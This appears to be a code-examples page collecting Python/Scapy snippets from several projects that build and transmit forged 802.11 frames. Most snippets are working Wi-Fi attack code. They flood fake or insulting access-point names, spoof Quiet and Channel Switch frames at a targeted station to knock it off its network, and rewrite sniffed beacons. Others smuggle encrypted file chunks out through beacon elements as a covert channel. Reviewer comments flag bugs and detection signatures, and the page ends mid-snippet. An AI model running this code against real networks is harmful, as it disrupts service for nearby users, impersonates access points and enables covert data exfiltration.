예제 #1
def stormWithBeaconFrames():
    """Broadcast a forged beacon for a fixed test SSID until interrupted.

    Builds RadioTap/Dot11/Dot11Beacon/SSID/RSN, prints the frame and its
    hexdump, waits for Enter, then calls ``sendp(..., loop=1)``, which
    does not return on its own.  Needs a monitor-mode interface and the
    Scapy names (Dot11, RandMAC, sendp, hexdump, ...) in module scope.
    Beacons carry no integrity protection unless the network deploys
    beacon protection, so a WIDS can only flag this by content (random
    BSSIDs advertising the same SSID).
    """
    global interfaceName
    global monitorInterface  # declared global but never read or written here
    # NOTE(review): the log line names `interfaceName`, but the frame is sent
    # on the hard-coded `iface` below -- the two can disagree.
    log("Starting with storming on interface [{}]".format(interfaceName))
    
    netSSID = 'testSSID'       #Network name here
    iface = 'wlan0mon'         #Interface name here

    # Management frame (type 0), beacon (subtype 8) to broadcast; transmitter
    # address and BSSID are drawn at random on every call.
    dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC()))
    
    beacon = Dot11Beacon(cap='ESS+privacy')
    essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
    # RSN element advertising WPA2-PSK (TKIP group cipher, CCMP+TKIP
    # pairwise).  Written as text literals: assumes Python 2 str semantics
    # (raw_input below confirms a Python 2 file).
    rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00'                 #RSN Version 1
'\x00\x0f\xac\x02'         #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00'                 #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04'         #CCMP (AES) cipher
'\x00\x0f\xac\x02'         #TKIP cipher
'\x01\x00'                 #1 Authentication Key Management Suite (line below)
'\x00\x0f\xac\x02'         #Pre-Shared Key
'\x00\x00'))               #RSN Capabilities (no extra capabilities)

    frame = RadioTap()/dot11/beacon/essid/rsn

    frame.show()
    print("\nHexdump of frame:")
    hexdump(frame)
    raw_input("\nPress enter to start\n")  # Python 2 builtin

    # inter=0.100 -> one frame every 100 ms; loop=1 -> repeat until interrupted
    sendp(frame, iface=iface, inter=0.100, loop=1)
예제 #2
파일: fakeAP.py 프로젝트: bac123hub/lanworm
def createAccessPoint(interface, ssid):
    """Advertise *ssid* as a WPA2-PSK network by looping a forged beacon.

    Args:
        interface: monitor-mode interface name passed to ``sendp``.
        ssid: network name placed in the SSID element.

    The transmitter address and BSSID are fixed constants, so every run
    advertises the same BSSID.  ``log`` is a module-level object with
    ``info``/``success`` methods (not the stdlib logger).  ``sendp`` with
    ``loop=1`` does not return on its own.
    """

    dot11 = Dot11(type=0,
                  subtype=8,
                  addr1='ff:ff:ff:ff:ff:ff',
                  addr2='22:22:22:22:22:22',
                  addr3='33:33:33:33:33:33')
    beacon = Dot11Beacon(cap='ESS+privacy')
    essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
    # RSN element: version 1, TKIP group cipher, CCMP+TKIP pairwise, PSK
    # key management, no capabilities -- the same blob used across this page.
    rsn = Dot11Elt(ID='RSNinfo',
                   info=('\x01\x00'
                         '\x00\x0f\xac\x02'
                         '\x02\x00'
                         '\x00\x0f\xac\x04'
                         '\x00\x0f\xac\x02'
                         '\x01\x00'
                         '\x00\x0f\xac\x02'
                         '\x00\x00'))

    frame = RadioTap() / dot11 / beacon / essid / rsn

    log.info("Beacon Frame created with SSID: '" + ssid + "'")
    log.info("Transmitting Beacon through interface '" + interface + "'")

    raw_input("\nPress Enter to start Access Point '" + ssid + "'\n")  # Python 2 builtin
    # Logged before anything is sent; no association handling exists here.
    log.success("Access Point Created!")

    sendp(frame, iface=interface, inter=0.10, loop=1)
예제 #3
def ssidSpawner(config):
    """Build beacons for generated SSIDs without end.

    ``config`` is a dict read for "iface" and "channel".  The ``while True``
    loop below has no ``break``, so the ``sendp`` after it is never reached;
    each iteration prints an SSID and a frame repr and appends the frame to
    ``frames``, which grows until the process is stopped.
    """
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])

    frames = []
    while True:
        netSSID = id_generator()    # id_generator is defined elsewhere in the file
        print(netSSID)
        dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()), addr3=str(RandMAC()))
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
        # NOTE(review): the version field is a single byte here, whereas the
        # other RSN blobs on this page use the two-byte '\x01\x00'.
        rsn = Dot11Elt(ID='RSNinfo', info=(
          '\x01'                     #RSN Version 1
          '\x00\x0f\xac\x02'         #Group Cipher Suite : 00-0f-ac TKIP
          '\x02\x00'                 #2 Pairwise Cipher Suites (next two lines)
          '\x00\x0f\xac\x04'         #CCMP (AES) cipher
          '\x00\x0f\xac\x02'         #TKIP cipher
          '\x01\x00'                 #1 Authentication Key Management Suite (line below)
          '\x00\x0f\xac\x02'         #Pre-Shared Key
          '\x00\x00'))               #RSN Capabilities (no extra capabilities)

        frame = RadioTap()/dot11/beacon/essid/rsn
        print("SSID=%-20s   %r"%(netSSID,frame))
        frames.append(frame)
    # Unreachable (see docstring).  `iface` is also not a name defined in
    # this function; the setup calls above use config["iface"].
    sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1)        
예제 #4
def quietAttack(config):
    """Send beacons carrying a Quiet element to one station for a fixed time.

    ``config`` keys read here: "iface", "channel", "time" (seconds to run),
    "mac" (addr1), "bssid" (addr2/addr3), "ssid", "interval" (sleep between
    frames).  ``setMonitorMode``, ``setChannel`` and ``printTime`` are
    defined elsewhere in the file.  Beacons are unauthenticated unless the
    network deploys beacon protection; a WIDS can flag a Quiet element that
    the legitimate AP never advertises.
    """
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])
    timeToRun = (time.time() + config["time"])

    # Unicast beacon: addr1 is the targeted station rather than broadcast.
    dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
    beacon = Dot11Beacon(cap='ESS+privacy')
    essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
    # NOTE(review): `rsn` is built but not part of `frame` below.  Its version
    # field is also one byte, unlike the '\x01\x00' used elsewhere on this page,
    # and its capability bytes differ ('\x01\x00').
    rsn = Dot11Elt(ID='RSNinfo', info=(
        '\x01'                     #RSN Version 1
        '\x00\x0f\xac\x02'         #Group Cipher Suite : 00-0f-ac TKIP
        '\x02\x00'                 #2 Pairwise Cipher Suites (next two lines)
        '\x00\x0f\xac\x04'         #CCMP (AES) cipher
        '\x00\x0f\xac\x02'         #TKIP cipher
        '\x01\x00'                 #1 Authentication Key Management Suite (line below)
        '\x00\x0f\xac\x02'         #Pre-Shared Key
        '\x01\x00'))               #RSN Capabilities

    # Quiet element fields as laid out by the author (count, period,
    # duration, offset); the bytes are text literals, so Python 2 str
    # semantics are assumed here.
    quiet = Dot11Elt(ID='Quiet', info=(
    '\x00'          #Quiet count     | beacon intervals until the quiet interval starts (0 = immediately)
    '\x00'          #Quiet period    | 0 = no repeating quiet periods
    '\x00\x10'      #Quiet duration  | length of the quiet interval in time units (TU)
    '\x00\x00'))    #Quiet offset    | start offset after the beacon, in TU; must stay below the beacon interval
    frame = RadioTap()/dot11/beacon/essid/quiet

    printTime()
    # One frame per `interval` seconds until `timeToRun` has passed.
    while(time.time() < timeToRun):
        sendp(frame, iface=config["iface"], loop=0, verbose=0)
        time.sleep(config["interval"])  
    printTime()
예제 #5
def test():
    """Loop a forged WPA2-PSK beacon for a fixed SSID on a fixed interface.

    Same construction as the other examples on this page: fixed BSSID
    '33:33:33:33:33:33', transmitter '22:22:22:22:22:22'.  Prints the frame
    and its hexdump, waits for Enter, then ``sendp(..., loop=1)`` runs until
    interrupted.  ``raw_input`` marks this as Python 2 code.
    """
    netSSID = 'testSSID' #Network name here
    iface = 'mon5'   #Interface name here

    dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',
                  addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33')
    beacon = Dot11Beacon(cap='ESS+privacy')
    essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
    rsn = Dot11Elt(ID='RSNinfo', info=(
        '\x01\x00'              #RSN Version 1
        '\x00\x0f\xac\x02'      #Group Cipher Suite : 00-0f-ac TKIP
        '\x02\x00'              #2 Pairwise Cipher Suites (next two lines)
        '\x00\x0f\xac\x04'      #CCMP (AES) cipher
        '\x00\x0f\xac\x02'      #TKIP cipher
        '\x01\x00'              #1 Authentication Key Management Suite (line below)
        '\x00\x0f\xac\x02'      #Pre-Shared Key
        '\x00\x00'))            #RSN Capabilities (no extra capabilities)

    frame = RadioTap()/dot11/beacon/essid/rsn
    frame.show()
    print("\nHexDump of frame:")
    hexdump(frame)
    raw_input("\nPress enter to start\n")

    # 100 ms between frames, repeated until interrupted
    sendp(frame, iface=iface, inter=0.100, loop=1)
예제 #6
파일: test.py 프로젝트: cjcase/beaconleak
def send_file(filename):
    """Stream a file over the air as a sequence of encrypted beacon elements.

    Each chunk becomes two Dot11Elt layers (ID 253 = encrypted sequence
    number, ID 254 = encrypted data) appended to the module-level
    ``t_frame``.  ``box`` (an encrypting object with ``encrypt``), ``if0``,
    ``opt``, ``stat_file`` and ``check_missing`` all come from module scope.
    After the last chunk it blocks in ``sniff`` until ``check_missing``
    stops it.  Frames of this shape (non-standard element IDs with opaque
    payloads) are a detectable covert-channel signature for a WIDS.
    """
    print("[*] Sending data...")
    # NOTE(review): the handle is never closed; no `with` or f.close() here.
    f = open(filename, 'rb')
    # r_size is the per-chunk read size; chunks is the chunk count.
    file_size, chunks, r_size = stat_file(filename)
    pos = 0
    start = time.time()
    for seq in range(chunks):
        m_seq = str(seq)
        seq_c = box.encrypt(bytes(m_seq, 'ascii'))
        _seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c))
        chunk = f.read(r_size)  # crypto ovh + element ovh
        chunk_c = box.encrypt(chunk)
        _data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c))
        _frame = t_frame / _seq / _data
        sendp(_frame, iface=if0, verbose=0, realtime=True)
        tell = f.tell()
        print(
            f"\t[i] sent frame {seq} of {chunks}, data[{pos}:{tell}], frame size: {len(_frame)}"
        )
        pos = tell
    end = time.time()
    print(f"[*] sent {chunks} in {end - start} seconds")
    # 325 is presumably the plaintext bytes per chunk -- confirm against
    # stat_file.  Divides by zero if end == start (e.g. chunks == 0).
    band = (chunks * 325) / (end - start)
    print(f"[*] speed: {(band * 8) / 1000} kbps")
    print("[*] listening for chunk resend")
    sniff(iface=opt.iface, stop_filter=check_missing, monitor=True)
    print("[*] done!")
예제 #7
def main():
    """Advertise every SSID given on the command line from random BSSIDs.

    Usage: ``script <iface> <ssid> [<ssid> ...]``.  Builds one WPA2-PSK
    beacon per SSID, prints each, then hands the whole list to ``sendp``
    with ``loop=1`` (never returns on its own).  Uses Python 2 ``print``
    statements.  No argument-count check: with no arguments ``sys.argv[1]``
    raises IndexError.
    """
    ssids = sys.argv[2:]  #Network name here
    iface = sys.argv[1]  #Interface name here
    frames = []
    for netSSID in ssids:
        print netSSID
        dot11 = Dot11(type=0,
                      subtype=8,
                      addr1='ff:ff:ff:ff:ff:ff',
                      addr2=str(RandMAC()),
                      addr3=str(RandMAC()))
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID))
        rsn = Dot11Elt(
            ID='RSNinfo',
            info=(
                '\x01\x00'  #RSN Version 1
                '\x00\x0f\xac\x02'  #Group Cipher Suite : 00-0f-ac TKIP
                '\x02\x00'  #2 Pairwise Cipher Suites (next two lines)
                '\x00\x0f\xac\x04'  #CCMP (AES) cipher
                '\x00\x0f\xac\x02'  #TKIP cipher
                '\x01\x00'  #1 Authentication Key Management Suite (line below)
                '\x00\x0f\xac\x02'  #Pre-Shared Key
                '\x00\x00'))  #RSN Capabilities (no extra capabilities)

        frame = RadioTap() / dot11 / beacon / essid / rsn
        print "SSID=%-20s   %r" % (netSSID, frame)
        frames.append(frame)
    # 10 ms spacing for small lists, back-to-back for 10 or more frames
    sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
예제 #8
def main():
    """Advertise one SSID per entry of ``ap_slander``, each from a random BSSID.

    Usage: ``script <iface> <words of name>``; the words are joined with
    spaces and each ``ap_slander`` suffix (a module-level iterable of
    strings) is appended in upper case.  Exits with status 1 on too few
    arguments.  ``sendp(..., loop=1)`` never returns on its own.
    """
    if len(sys.argv) < 3:
        print("usage: %s <interface> <words of name>" % sys.argv[0])
        sys.exit(1)

    iface = sys.argv[1]
    name = ' '.join(sys.argv[2:])

    frames = []
    for suffix in ap_slander:
        ssid = name + ' ' + suffix.upper()
        print(ssid)
        dot11 = Dot11(type=0,
                      subtype=8,
                      addr1='ff:ff:ff:ff:ff:ff',
                      addr2=str(RandMAC()),
                      addr3=str(RandMAC()))
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
        rsn = Dot11Elt(
            ID='RSNinfo',
            info=(
                '\x01\x00'  #RSN Version 1
                '\x00\x0f\xac\x02'  #Group Cipher Suite : 00-0f-ac TKIP
                '\x02\x00'  #2 Pairwise Cipher Suites (next two lines)
                '\x00\x0f\xac\x04'  #CCMP (AES) cipher
                '\x00\x0f\xac\x02'  #TKIP cipher
                '\x01\x00'  #1 Authentication Key Management Suite (line below)
                '\x00\x0f\xac\x02'  #Pre-Shared Key
                '\x00\x00'))  #RSN Capabilities (no extra capabilities)

        frame = RadioTap() / dot11 / beacon / essid / rsn
        frames.append(frame)
    # 10 ms spacing for small lists, back-to-back for 10 or more frames
    sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
    def create_beacon(name, password_protected=False):
        """Build a beacon frame advertising *name* from a random BSSID.

        Returns RadioTap/Dot11/Dot11Beacon/SSID.  When ``password_protected``
        is true the beacon sets the privacy capability bit and gains an RSN
        element (WPA2-PSK: TKIP group, CCMP+TKIP pairwise).  Nothing is sent.
        """
        header = Dot11(type=0,
                       subtype=8,
                       addr1='ff:ff:ff:ff:ff:ff',
                       addr2=str(RandMAC()),
                       addr3=str(RandMAC()))

        capabilities = 'ESS'
        if password_protected:
            capabilities = 'ESS+privacy'

        stack = RadioTap() / header / Dot11Beacon(cap=capabilities)
        stack = stack / Dot11Elt(ID='SSID', info=name, len=len(name))

        if password_protected:
            rsn_blob = ('\x01\x00'
                        '\x00\x0f\xac\x02'
                        '\x02\x00'
                        '\x00\x0f\xac\x04'
                        '\x00\x0f\xac\x02'
                        '\x01\x00'
                        '\x00\x0f\xac\x02'
                        '\x00\x00')
            stack = stack / Dot11Elt(ID='RSNinfo', info=rsn_blob)

        return stack
예제 #10
def channelSwitchAttack(config):
    """Send a station a Channel Switch Announcement for a fixed time.

    ``config`` keys read: "iface", "channel", "time", "mac" (addr1),
    "bssid" (addr2/addr3), "ssid", "interval".  ``frameType`` is hard-coded
    to "beacon", so the action-frame branch is dead code as written.
    CSA elements from a BSSID that the real AP does not announce are a
    well-known WIDS signature; beacons are unauthenticated unless beacon
    protection is deployed.
    """
    frame = ""
    frameType = "beacon"  #choose between action_frame or beacon.
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])  
    timeToRun = (time.time() + config["time"])

    print("Sending channelSwitchBeacon to " + str(config["mac"]) + " from: " + config["bssid"] + " on channel: " + str(config["channel"]))
    if(frameType == "action_frame"):
        # Management frame, subtype 13 = action
        dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
        # Two raw bytes (category, action) spliced in as a plain payload
        # rather than a Scapy layer.
        category = ('\x00' # spectrum management
                    '\x04')    #channel switch announcement
        csa = Dot11Elt(ID='Channel Switch', info=(
        '\x00'  #Channel switch mode
        '\x04'  #new channel number
        '\x00')) #channel switch count
        frame = RadioTap()/dot11/category/csa
    elif(frameType == "beacon"): 
        dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
        csa = Dot11Elt(ID='Channel Switch', info=(
        '\x00'      #Channel switch mode
        '\x64'      #new channel number (0x64 = 100)
        '\x00'))    #channel switch count
        frame = RadioTap()/dot11/beacon/essid/csa

    printTime()
    # One frame per `interval` seconds until `timeToRun` has passed.
    while(time.time() < timeToRun):  
        sendp(frame, iface=config["iface"], loop=0, verbose=0)
        time.sleep(config["interval"])
    printTime()
예제 #11
파일: test.py 프로젝트: cjcase/beaconleak
def recv_missing(tally):
    """Report the chunk numbers in *tally* back to the sender over the air.

    Encodes the numbers as a ':'-joined string and the module-level
    ``t_file`` name, encrypts both with ``box`` and appends them to
    ``t_frame`` as elements ID 224 and ID 225.  ``opt.iface`` comes from
    module scope.  ``fname`` is assigned but never used.
    """
    msg = ":".join(str(x) for x in tally)
    msg_c = box.encrypt(msg.encode('utf-8'))
    fname = t_file
    fname_c = box.encrypt(t_file.encode('utf-8'))
    _data = Dot11Elt(ID=224, info=msg_c, len=len(msg_c))
    _fname = Dot11Elt(ID=225, info=fname_c, len=len(fname_c))
    sendp(t_frame / _data / _fname, iface=opt.iface)
예제 #12
 def probe_resp(self, message):
     """Send one Probe Response (subtype 5) carrying *message* on self.interface.

     Relies on ``self.base_frame`` for the header/SSID and appends the
     instance's supported rates and DS parameter set.
     """
     frame = self.base_frame(5, message=message)
     frame = frame / Dot11Elt(ID='Rates', info=self.rates)
     frame = frame / Dot11Elt(ID='DSset', info=self.dsset)
     print("[*] 802.11 Probe Response: SSID = %s" % self.net_ssid)
     sendp(frame, iface=self.interface, inter=0.100, loop=0, verbose=False)
예제 #13
 def probe_req(self, message=''):
     """Send a Probe Request (subtype 4) and wait for a reply via ``srp``.

     Unlike ``probe_resp`` this does not pass ``iface=self.interface``, so
     ``srp`` uses Scapy's default interface.  With an empty *message*,
     ``base_frame`` returns a list and the ``/`` below raises.
     """
     subtype = 4
     frame = self.base_frame(subtype, message=message)
     rates = Dot11Elt(ID='Rates', info=self.rates)
     dsset = Dot11Elt(ID='DSset', info=self.dsset)
     frame = frame / rates / dsset
     print("[*] 802.11 Probe Request: SSID = %s" % self.net_ssid)
     srp(frame)
예제 #14
def build(name):
    """Return a beacon from ``source`` to ``dest`` advertising ``ssid(name)``.

    ``dest``, ``source`` and ``ssid`` are module-level names.  ``cap`` is
    given as the raw bitmask 0x1111 and the Rates element lists eight
    rate bytes.  Nothing is transmitted.
    """
    header = Dot11(type=0, subtype=8, addr1=dest, addr2=source, addr3=source)
    body = Dot11Beacon(cap=0x1111)
    body = body / Dot11Elt(ID="SSID", info=ssid(name))
    body = body / Dot11Elt(ID="Rates", info=bytes([140, 18, 152, 36, 176, 72, 96, 108]))
    return RadioTap() / header / body
예제 #15
    def geracao_pacotes(self):
        """Send a fixed number of forged beacons and refresh the UI.

        Reads the packet count and send interval from the ``numero_pacotes``
        and ``intervalo`` widgets, derives a forged source MAC from
        ``self.criacao_mac_ponto_referencia()``, and appends the literal
        "RURALRURALRURAL" as raw payload after the RSN element.  The
        interface name is hard-coded.
        """

        netSSID = 'testSSID'
        iface = 'wlp3s0mon'  # wireless interface name

        mac_forjado_pr = self.criacao_mac_ponto_referencia()  # forged reference-point MAC
        numero_pacotes = int(self.numero_pacotes.get())  # number of packets to send
        intervalo_envio = float(self.intervalo.get())  # seconds between packets

        ## addr1 = destination MAC (the wireless card's MAC)
        ## addr2 = source MAC of the sender (forged)
        ## addr3 = access point MAC

        dot11 = Dot11(type=0,
                      subtype=8,
                      addr1='E4:18:6B:4B:94:00',
                      addr2=mac_forjado_pr,
                      addr3='33:33:33:33:33:33')

        beacon = Dot11Beacon(
            cap='ESS+privacy')  ## access point capability flags

        essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID))

        # RSN element: WPA2-PSK with TKIP group and CCMP+TKIP pairwise ciphers
        rsn = Dot11Elt(ID='RSNinfo',
                       info=('\x01\x00'
                             '\x00\x0f\xac\x02'
                             '\x02\x00'
                             '\x00\x0f\xac\x04'
                             '\x00\x0f\xac\x02'
                             '\x01\x00'
                             '\x00\x0f\xac\x02'
                             '\x00\x00'))

        frame = RadioTap() / dot11 / beacon / essid / rsn

        frame.show()
        print("HexDump of frame")

        hexdump(frame)

        # loop=0 with count=numero_pacotes: exactly that many frames
        a = sendp(frame / "RURALRURALRURAL",
                  iface=iface,
                  inter=intervalo_envio,
                  loop=0,
                  count=numero_pacotes
                  )  # inter = interval between packet sends
        print(a)

        self.atualizar_tela()  # refresh the screen
예제 #16
파일: wifi.py 프로젝트: xfiltr8/pwnagotchi
def encapsulate(payload, addr_from, addr_to=BroadcastAddress):
    """Wrap *payload* in a beacon frame as a chain of information elements.

    The frame is RadioTap/Dot11 (beacon, addr1=*addr_to*, addr2 = the
    module-level ``SignatureAddress``, addr3=*addr_from*)/Dot11Beacon, followed
    by one ``Dot11ElemID_Identity`` element per 255-byte slice of *payload*
    (the last slice may be shorter).  An empty payload yields no elements.
    Nothing is transmitted; the frame is returned.
    """
    from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap

    header = Dot11(type=0,
                   subtype=8,
                   addr1=addr_to,
                   addr2=SignatureAddress,
                   addr3=addr_from)
    frame = RadioTap() / header / Dot11Beacon(cap='ESS')

    slice_len = 255
    for start in range(0, len(payload), slice_len):
        piece = payload[start:start + slice_len]
        frame /= Dot11Elt(ID=Dot11ElemID_Identity, info=piece, len=len(piece))

    return frame
def create_packet(packet):
    """Rewrite a sniffed beacon's DS Parameter Set and re-send it in a loop.

    Shaped as a Scapy ``sniff(prn=...)`` callback: frames without a
    Dot11Beacon layer are ignored.  Reads ``args.Interface`` from module
    scope and never returns once ``sendp(..., loop=1)`` starts.
    ``bssid`` and ``ssid`` are extracted but not used afterwards.
    """
    #hexdump(packet)
    if packet.haslayer(Dot11Beacon):
        # extract the MAC address of the network
        bssid = packet[Dot11].addr2
        # get the name of it (first element is assumed to be the SSID)
        ssid = packet[Dot11Elt].info.decode()
        # extract network stats
        stats = packet[Dot11Beacon].network_stats()
        # get the channel of the AP; None when absent, which makes the
        # arithmetic below raise TypeError
        channel = stats.get("channel")
        # calculate the new channel; note 5 -> 0 and values above 11 wrap,
        # so the result is not always a valid 2.4 GHz channel
        newChannel = (channel + 6) % 11
        # the 4th element onward (index 3) is kept as the tail; fewer
        # elements would raise IndexError
        oldEltend = packet[Dot11Elt][3]
        # same object as `packet`, not a copy
        newPacket = packet
        # replace the 3rd element with a DSset; per the original author this
        # drops everything after it -- not verified here.  chr() gives str,
        # not bytes, on Python 3.
        newPacket[Dot11Elt][2] = Dot11Elt(ID='DSset',
                                          info=chr(newChannel),
                                          len=1)
        # concatenate the end of the packet with what we created before
        finalPacket = newPacket / oldEltend
        # send the packet until the user stops it (100 ms spacing)
        sendp(finalPacket, iface=args.Interface, inter=0.10, loop=1)
예제 #18
파일: test.py 프로젝트: cjcase/beaconleak
def send_stat(filename):
    """Announce a file's size and chunk count in one encrypted element (ID 222).

    ``stat_file``, ``box``, ``t_frame`` and ``if0`` come from module scope;
    ``r_size`` is unpacked but unused here.
    """
    file_size, chunks, r_size = stat_file(filename)
    print("[*] Sending file stat frame...")
    payload = f"{file_size}:{chunks}".encode('ascii')
    payload_c = box.encrypt(payload)
    _payload = Dot11Elt(ID=222, info=payload_c, len=len(payload_c))
    tmp_frame = t_frame / _payload
    sendp(tmp_frame, iface=if0, verbose=0, realtime=True)
예제 #19
 def sendAssocReq():
     """Send one Association Request (subtype 0) to config["bssid"] from config["mac"].

     ``config`` is a module-level dict.  NOTE(review): ``Dot11AssoReq`` is
     given ``ID``/``info`` keyword arguments and an undefined name ``ESS``;
     those look like leftovers from a ``Dot11Elt`` call -- confirm this line
     constructs at all.  The RSN element is built but commented out of the
     frame.
     """
     #packet to client
     dot11 = Dot11(type=0, subtype=0, addr1=config["bssid"], addr2=config["mac"], addr3=config["mac"])
     auth = Dot11AssoReq(ID=ESS, info='\x01')#ESS=0x0, privacy=0x1 per the original author
     essid = Dot11Elt(ID='SSID',info="wips-test-psk", len=len("wips-test-psk"))
     #convert rsn to Dot11EltRSN
     # Version field is one byte here, unlike '\x01\x00' elsewhere on this page.
     rsn = Dot11Elt(ID='RSNinfo', info=(
       '\x01'                     #RSN Version 1
       '\x00\x0f\xac\x02'         #Group Cipher Suite : 00-0f-ac TKIP
       '\x02\x00'                 #2 Pairwise Cipher Suites (next two lines)
       '\x00\x0f\xac\x04'         #CCMP (AES) cipher
       '\x00\x0f\xac\x02'         #TKIP cipher
       '\x01\x00'                 #1 Authentication Key Management Suite (line below)
       '\x00\x0f\xac\x02'         #Pre-Shared Key
       '\x00\x00'))               #RSN Capabilities (no extra capabilities)
     frame = RadioTap()/dot11/auth/essid#/rsn  
     frame.show()
     sendp(frame, iface=config["iface"], inter=0.100, loop=0) 
예제 #20
파일: test.py 프로젝트: cjcase/beaconleak
def send_chunks(filename, chunk_list):
    """Re-send the chunks numbered in *chunk_list* from *filename*.

    Each chunk is read at offset ``r_size * seq``, encrypted with the
    module-level ``box`` and sent as elements ID 253 (sequence) and ID 254
    (data) appended to ``t_frame`` on ``if0``.  ``file_size`` is unused.
    """
    file_size, chunks, r_size = stat_file(filename)
    with open(filename, 'rb') as f:
        for seq in chunk_list:
            m_seq = str(seq)
            seq_c = box.encrypt(bytes(m_seq, 'ascii'))
            _seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c))
            chunk_offset = (r_size * seq)
            f.seek(chunk_offset)
            chunk = f.read(r_size)
            chunk_c = box.encrypt(chunk)
            _data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c))
            _frame = t_frame / _seq / _data
            sendp(_frame, iface=if0, verbose=0, realtime=True)
            tell = f.tell()
            print(
                f"\t[i] resent frame {seq} of {chunks}, data[{chunk_offset}:{tell}], frame size: {len(_frame)}"
            )
예제 #21
def gen_packet(ssid, source_mac):
    """Return a WPA2-PSK beacon frame for *ssid* transmitted from *source_mac*.

    Only builds the packet; nothing is transmitted.  The RSN element is the
    blob used throughout this page: version 1, TKIP group cipher, CCMP+TKIP
    pairwise ciphers, PSK key management, no extra capabilities.
    """
    rsn_bytes = ('\x01\x00'
                 '\x00\x0f\xac\x02'
                 '\x02\x00'
                 '\x00\x0f\xac\x04'
                 '\x00\x0f\xac\x02'
                 '\x01\x00'
                 '\x00\x0f\xac\x02'
                 '\x00\x00')
    header = Dot11(type=0, subtype=8,
                   addr1="ff:ff:ff:ff:ff:ff",
                   addr2=source_mac, addr3=source_mac)
    body = Dot11Beacon(cap="ESS+privacy")
    body = body / Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
    body = body / Dot11Elt(ID="RSNinfo", info=rsn_bytes)
    return RadioTap() / header / body
예제 #22
def send_beacon(mac, ssid, verbose = False):
	"""Loop a privacy-flagged beacon for *ssid* from BSSID *mac* until interrupted.

	Sends on the module-level ``interface``, one frame every 0.1 s; no RSN
	element is attached, only the capability bit.  Prints the SSID first
	when *verbose* is true.
	"""
	header = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac, type=0, subtype=8)
	body = Dot11Beacon(cap="ESS+privacy")
	body = body / Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
	frame = RadioTap() / header / body

	if verbose:
		print(f"Sending beacon: {ssid}")

	sendp(frame, inter=0.1, loop=1, iface=interface, verbose=0)
예제 #23
파일: knocknock.py 프로젝트: cWjL/knocknock
 def _send_802_11_frame(self, ssid):
     """Send a single open-network beacon for *ssid* on self.ap.iface.

     ``self.ap.ip`` is used as both transmitter address and BSSID despite
     its name -- presumably it holds a MAC string; confirm.  The RadioTap
     header is hand-built: fixed 18-byte length, the listed present flags,
     and a raw body containing a frequency from ``get_frequency(self.ap.ch)``.
     Text literals are concatenated with that value, so Python 2 str
     semantics are assumed.
     """
     dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff",
                   addr2=self.ap.ip,addr3=self.ap.ip)
     beacon = Dot11Beacon()
     essid = Dot11Elt(ID='SSID',info=ssid,len=len(ssid))
     radiotap = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
                         notdecoded='\x00\x6c' +
                         get_frequency(self.ap.ch) +
                         '\xc0\x00\xc0\x01\x00\x00')
     frame = radiotap/dot11/beacon/essid
     sendp(frame, iface=self.ap.iface, verbose=False)
예제 #24
 def __beacon_send(self, ssid, inter, enc):
     """Loop a beacon for *ssid* from two random MACs on self.iface.

     Args:
         ssid: network name for the SSID element.
         inter: seconds between frames, passed to ``sendp``.
         enc: when true, advertise WPA2-PSK (privacy bit + RSN element);
             otherwise an open network with no RSN element.

     ``gu.rand_mac`` comes from module scope.  ``sendp(..., loop=1)`` does
     not return on its own.
     """
     addr2 = gu.rand_mac()
     addr3 = gu.rand_mac()
     dot11 = Dot11(type=0,
                   subtype=8,
                   addr1='ff:ff:ff:ff:ff:ff',
                   addr2=addr2,
                   addr3=addr3)
     beacon = Dot11Beacon(cap='ESS')
     beacon_enc = Dot11Beacon(cap='ESS+privacy')
     essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
     # Same RSN bytes as the multi-line blobs elsewhere on this page:
     # version 1, TKIP group, CCMP+TKIP pairwise, PSK AKM, no capabilities.
     rsn = Dot11Elt(
         ID='RSNinfo',
         info=
